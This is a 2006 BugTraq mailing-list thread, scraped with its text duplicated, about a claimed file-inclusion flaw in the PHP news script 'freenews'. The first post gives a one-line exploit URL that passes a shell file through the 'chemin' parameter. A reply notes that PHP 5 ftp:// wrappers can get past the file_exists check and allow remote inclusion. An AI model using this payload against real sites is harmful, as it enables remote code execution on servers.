BugTraq
Back to list
|
Post reply
freenews---> fileinclude
Oct 28 2006 11:25PM
xp1o msn com ( MoHaNdKo )
(1 replies)
Re: freenews---> fileinclude
Oct 30 2006 09:18PM
Tamriel (tamriel gmx net)
(1 replies)
Re: freenews---> fileinclude
Oct 31 2006 10:22AM
pokley (pokleyzz scan-associates net)
In PHP 5.x file_exists function have support for Protocols/Wrappers .
So setting $chemin to ftp://blablablab.com/ will work in this case
On Tue, 31 Oct 2006 05:18:58 +0800, Tamriel <tamriel (at) gmx (dot) net [email concealed]> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> I would quote the whole code arround the includes, like:
>
> [...]
> if (file_exists("./".$chemin."/config.php")){
> include ("$chemin/config.php");
> include ("$chemin/options.inc.php");
> include ("$chemin/freenews_functions.inc.php");
> }
> [...]
>
> You could only include files on the same server, not remote and not a
> shell.txt.
>
>
> MoHaNdKo wrote:
>> ########################################################
>> #
>> #freenews---> fileinclude
>> ###############################
>> #
>> #include ("$chemin/config.php");
>> #include ("$chemin/functions.inc.php");
>> #include ("$chemin/options.inc.php");
>> #******************************************
>> #name: MoHaNdKo
>> #E-mail : xp1o (at) msn (dot) com [email concealed]
>> #
>> #
>> #********************
>> #exploit:
>> # www.****.com/path/aff_news.php?chemin=shell.txt?
>> #
>> #
>> #********************
>> #Greatz:
>> # www.xp10.com & www.d4eg.org & www.dmazika.org
>> #
>> # www.tryag.com
>
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.5 (MingW32)
>
> iD8DBQFFRmxCqBhP+Twks7oRCqoAAJ9YaqJn7Mdptjgc17uIV76Qcy5eVwCfRNpf
> DmmJNRb3gp/R32Dq8dINQks=
> =BGMI
> -----END PGP SIGNATURE-----
>
--
Using Opera's revolutionary e-mail client: http://www.opera.com/m2/
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
So setting $chemin to ftp://blablablab.com/ will work in this case
On Tue, 31 Oct 2006 05:18:58 +0800, Tamriel <tamriel (at) gmx (dot) net [email concealed]> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> I would quote the whole code arround the includes, like:
>
> [...]
> if (file_exists("./".$chemin."/config.php")){
> include ("$chemin/config.php");
> include ("$chemin/options.inc.php");
> include ("$chemin/freenews_functions.inc.php");
> }
> [...]
>
> You could only include files on the same server, not remote and not a
> shell.txt.
>
>
> MoHaNdKo wrote:
>> ########################################################
>> #
>> #freenews---> fileinclude
>> ###############################
>> #
>> #include ("$chemin/config.php");
>> #include ("$chemin/functions.inc.php");
>> #include ("$chemin/options.inc.php");
>> #******************************************
>> #name: MoHaNdKo
>> #E-mail : xp1o (at) msn (dot) com [email concealed]
>> #
>> #
>> #********************
>> #exploit:
>> # www.****.com/path/aff_news.php?chemin=shell.txt?
>> #
>> #
>> #********************
>> #Greatz:
>> # www.xp10.com & www.d4eg.org & www.dmazika.org
>> #
>> # www.tryag.com
>
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.5 (MingW32)
>
> iD8DBQFFRmxCqBhP+Twks7oRCqoAAJ9YaqJn7Mdptjgc17uIV76Qcy5eVwCfRNpf
> DmmJNRb3gp/R32Dq8dINQks=
> =BGMI
> -----END PGP SIGNATURE-----
>
--
Using Opera's revolutionary e-mail client: http://www.opera.com/m2/
[ reply ]